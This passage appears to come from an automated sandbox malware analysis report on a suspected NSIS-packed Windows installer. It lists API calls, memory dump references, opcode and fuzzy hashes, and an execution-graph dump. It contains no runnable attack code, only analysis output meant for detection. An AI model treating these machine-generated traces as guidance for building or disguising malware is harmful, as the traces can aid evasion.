                                                                                                                                                                                                                    • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                    • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                    • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                    • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                    • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                                                    • String ID: Call
                                                                                                                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                    • Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                                                    • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                    • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                    • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77573420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                    • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                    • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                    • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6F26116A
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2611C7
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2611D9
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261203
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                                                    • Opcode ID: baa88afcbcf2073345d0122820c0a82c608bd188914e60473b6189336e795d9c
                                                                                                                                                                                                                    • Instruction ID: f566e6bdc25b8da72a27cd759ab33872d0fb45d6f13948db252cb2302d714893
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baa88afcbcf2073345d0122820c0a82c608bd188914e60473b6189336e795d9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231C6B240421ADFDB008F7CC94A97577E8FB0AB25710455AE840D7651E734F8D0CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                    • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:4.5%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                    Signature Coverage:1.6%
                                                                                                                                                                                                                    Total number of Nodes:1662
                                                                                                                                                                                                                    Total number of Limit Nodes:33
352d55a8 38 API calls 7285->7286 7287 352d544c 7286->7287 5775 352d220c 5776 352d221a 5775->5776 5777 352d2215 5775->5777 5781 352d20db 5776->5781 5789 352d22b1 5777->5789 5780 352d2228 5782 352d20e7 5781->5782 5784 352d210b 5782->5784 5788 352d20f6 5782->5788 5793 352d1eec 5782->5793 5786 352d1eec 50 API calls 5784->5786 5787 352d216d 5784->5787 5784->5788 5785 352d1eec 50 API calls 5785->5788 5786->5787 5787->5785 5787->5788 5788->5780 5790 352d22c7 5789->5790 5792 352d22d0 5790->5792 6283 352d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5790->6283 5792->5776 5794 352d1f2a 5793->5794 5795 352d1ef7 5793->5795 5836 352d2049 5794->5836 5797 352d1f1c 5795->5797 5798 352d1efc 5795->5798 5818 352d1f3f 5797->5818 5799 352d1f01 5798->5799 5800 352d1f12 5798->5800 5802 352d1f06 5799->5802 5805 352d240b 5799->5805 5810 352d23ec 5800->5810 5802->5784 5850 352d53e5 5805->5850 6034 352d3513 5810->6034 5813 352d23f5 5813->5802 5816 352d2408 5816->5802 5817 352d351e 7 API calls 5817->5813 5819 352d1f4b 5818->5819 6052 352d247c 5819->6052 5821 352d1f52 5822 352d1f7c 5821->5822 5823 352d2041 5821->5823 5835 352d1f57 5821->5835 6063 352d23de 5822->6063 6079 352d2639 IsProcessorFeaturePresent 5823->6079 5826 352d2048 5827 352d1f8b 5827->5835 6066 352d22fc RtlInitializeSListHead 5827->6066 5829 352d1f99 6067 352d46c5 5829->6067 5833 352d1fb8 5833->5835 6075 352d4669 5833->6075 5835->5802 5838 352d2055 5836->5838 5837 352d205e 5837->5802 5838->5837 5839 352d207d 5838->5839 5840 352d20d3 5838->5840 6156 352d244c 5839->6156 5841 352d2639 4 API calls 5840->5841 5843 352d20da 5841->5843 5844 352d2082 6165 352d2308 5844->6165 5846 352d2087 6168 352d20c4 5846->6168 5848 352d209f 6171 352d260b 5848->6171 5856 352d5aca 5850->5856 5853 352d351e 6005 352d3820 5853->6005 5855 352d2415 5855->5802 5857 352d2410 5856->5857 5858 352d5ad4 5856->5858 5857->5853 5864 352d5e08 5858->5864 5884 352d5c45 5864->5884 5866 352d5e2f 5867 352d5e47 TlsGetValue 
5866->5867 5868 352d5e3b 5866->5868 5867->5868 5890 352d2ada 5868->5890 5870 352d5adb 5870->5857 5871 352d5e5e 5870->5871 5872 352d5c45 5 API calls 5871->5872 5873 352d5e85 5872->5873 5874 352d5ea0 TlsSetValue 5873->5874 5875 352d5e94 5873->5875 5874->5875 5876 352d2ada 5 API calls 5875->5876 5877 352d5aee 5876->5877 5878 352d59b5 5877->5878 5879 352d59c0 5878->5879 5883 352d59d0 5878->5883 5905 352d59d6 5879->5905 5883->5857 5885 352d5c71 5884->5885 5889 352d5c75 5884->5889 5888 352d5c95 5885->5888 5885->5889 5897 352d5ce1 5885->5897 5887 352d5ca1 GetProcAddress 5887->5889 5888->5887 5888->5889 5889->5866 5891 352d2ae5 IsProcessorFeaturePresent 5890->5891 5892 352d2ae3 5890->5892 5894 352d2b58 5891->5894 5892->5870 5904 352d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5894->5904 5896 352d2c3b 5896->5870 5898 352d5cf7 5897->5898 5899 352d5d02 LoadLibraryExW 5897->5899 5898->5885 5900 352d5d1f GetLastError 5899->5900 5903 352d5d37 5899->5903 5901 352d5d2a LoadLibraryExW 5900->5901 5900->5903 5901->5903 5902 352d5d4e FreeLibrary 5902->5898 5903->5898 5903->5902 5904->5896 5906 352d59e9 5905->5906 5907 352d59ef 5905->5907 5908 352d571e 20 API calls 5906->5908 5909 352d571e 20 API calls 5907->5909 5908->5907 5910 352d59fb 5909->5910 5911 352d571e 20 API calls 5910->5911 5912 352d5a06 5911->5912 5913 352d571e 20 API calls 5912->5913 5914 352d5a11 5913->5914 5915 352d571e 20 API calls 5914->5915 5916 352d5a1c 5915->5916 5917 352d571e 20 API calls 5916->5917 5918 352d5a27 5917->5918 5919 352d571e 20 API calls 5918->5919 5920 352d5a32 5919->5920 5921 352d571e 20 API calls 5920->5921 5922 352d5a3d 5921->5922 5923 352d571e 20 API calls 5922->5923 5924 352d5a48 5923->5924 5925 352d571e 20 API calls 5924->5925 5926 352d5a56 5925->5926 5937 352d589c 5926->5937 5931 352d571e 5932 352d5729 RtlFreeHeap 5931->5932 5933 352d5752 5931->5933 5932->5933 5934 352d573e 5932->5934 5933->5883 5971 352d6368 5934->5971 5943 352d57a8 5937->5943 
5939 352d58c0 5940 352d58ec 5939->5940 5955 352d5809 5940->5955 5942 352d5910 5942->5931 5944 352d57b4 5943->5944 5951 352d5671 RtlEnterCriticalSection 5944->5951 5946 352d57e8 5952 352d57fd 5946->5952 5948 352d57be 5948->5946 5950 352d571e 20 API calls 5948->5950 5949 352d57f5 5949->5939 5950->5946 5951->5948 5953 352d56b9 RtlLeaveCriticalSection 5952->5953 5954 352d5807 5953->5954 5954->5949 5956 352d5815 5955->5956 5963 352d5671 RtlEnterCriticalSection 5956->5963 5958 352d581f 5964 352d5a7f 5958->5964 5960 352d5832 5968 352d5848 5960->5968 5962 352d5840 5962->5942 5963->5958 5965 352d5ab5 5964->5965 5966 352d5a8e 5964->5966 5965->5960 5966->5965 5967 352d7cc2 20 API calls 5966->5967 5967->5965 5969 352d56b9 RtlLeaveCriticalSection 5968->5969 5970 352d5852 5969->5970 5970->5962 5974 352d5b7a GetLastError 5971->5974 5975 352d5b99 5974->5975 5976 352d5b93 5974->5976 5980 352d5bf0 SetLastError 5975->5980 5993 352d637b 5975->5993 5977 352d5e08 11 API calls 5976->5977 5977->5975 5983 352d5744 GetLastError 5980->5983 5981 352d5bb3 5985 352d571e 17 API calls 5981->5985 5982 352d5e5e 11 API calls 5984 352d5bc8 5982->5984 5983->5933 5984->5981 5986 352d5bcf 5984->5986 5987 352d5bb9 5985->5987 6000 352d593c 5986->6000 5989 352d5be7 SetLastError 5987->5989 5989->5983 5991 352d571e 17 API calls 5992 352d5be0 5991->5992 5992->5980 5992->5989 5998 352d6388 5993->5998 5994 352d63c8 5996 352d6368 19 API calls 5994->5996 5995 352d63b3 RtlAllocateHeap 5997 352d5bab 5995->5997 5995->5998 5996->5997 5997->5981 5997->5982 5998->5994 5998->5995 5999 352d474f 7 API calls 5998->5999 5999->5998 6001 352d5914 RtlEnterCriticalSection RtlLeaveCriticalSection 6000->6001 6002 352d5997 6001->6002 6003 352d58c4 20 API calls 6002->6003 6004 352d59ae 6003->6004 6004->5991 6006 352d382d 6005->6006 6010 352d384b 6005->6010 6007 352d383b 6006->6007 6011 352d3b67 6006->6011 6016 352d3ba2 6007->6016 6010->5855 6021 352d3a82 6011->6021 6013 352d3b81 6014 352d3b99 TlsGetValue 6013->6014 6015 352d3b8d 
6013->6015 6014->6015 6015->6007 6017 352d3a82 5 API calls 6016->6017 6018 352d3bbc 6017->6018 6019 352d3bd7 TlsSetValue 6018->6019 6020 352d3bcb 6018->6020 6019->6020 6020->6010 6022 352d3aaa 6021->6022 6026 352d3aa6 6021->6026 6022->6026 6027 352d39be 6022->6027 6025 352d3ac4 GetProcAddress 6025->6026 6026->6013 6032 352d39cd 6027->6032 6028 352d3a77 6028->6025 6028->6026 6029 352d39ea LoadLibraryExW 6030 352d3a05 GetLastError 6029->6030 6029->6032 6030->6032 6031 352d3a60 FreeLibrary 6031->6032 6032->6028 6032->6029 6032->6031 6033 352d3a38 LoadLibraryExW 6032->6033 6033->6032 6040 352d3856 6034->6040 6036 352d23f1 6036->5813 6037 352d53da 6036->6037 6038 352d5b7a 20 API calls 6037->6038 6039 352d23fd 6038->6039 6039->5816 6039->5817 6041 352d385f 6040->6041 6042 352d3862 GetLastError 6040->6042 6041->6036 6043 352d3b67 6 API calls 6042->6043 6044 352d3877 6043->6044 6045 352d3896 6044->6045 6046 352d38dc SetLastError 6044->6046 6047 352d3ba2 6 API calls 6044->6047 6045->6046 6046->6036 6048 352d3890 6047->6048 6048->6045 6049 352d38b8 6048->6049 6050 352d3ba2 6 API calls 6048->6050 6049->6045 6051 352d3ba2 6 API calls 6049->6051 6050->6049 6051->6045 6053 352d2485 6052->6053 6083 352d2933 IsProcessorFeaturePresent 6053->6083 6057 352d2496 6058 352d249a 6057->6058 6094 352d53c8 6057->6094 6058->5821 6061 352d24b1 6061->5821 6150 352d24b5 6063->6150 6065 352d23e5 6065->5827 6066->5829 6070 352d46dc 6067->6070 6068 352d2ada 5 API calls 6069 352d1fad 6068->6069 6069->5835 6071 352d23b3 6069->6071 6070->6068 6072 352d23b8 6071->6072 6073 352d2933 IsProcessorFeaturePresent 6072->6073 6074 352d23c1 6072->6074 6073->6074 6074->5833 6076 352d4698 6075->6076 6077 352d2ada 5 API calls 6076->6077 6078 352d46c1 6077->6078 6078->5835 6080 352d264e 6079->6080 6081 352d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6080->6081 6082 352d2744 6081->6082 6082->5826 6084 352d2491 6083->6084 6085 352d34ea 6084->6085 6086 352d34ef 6085->6086 6105 352d3936 
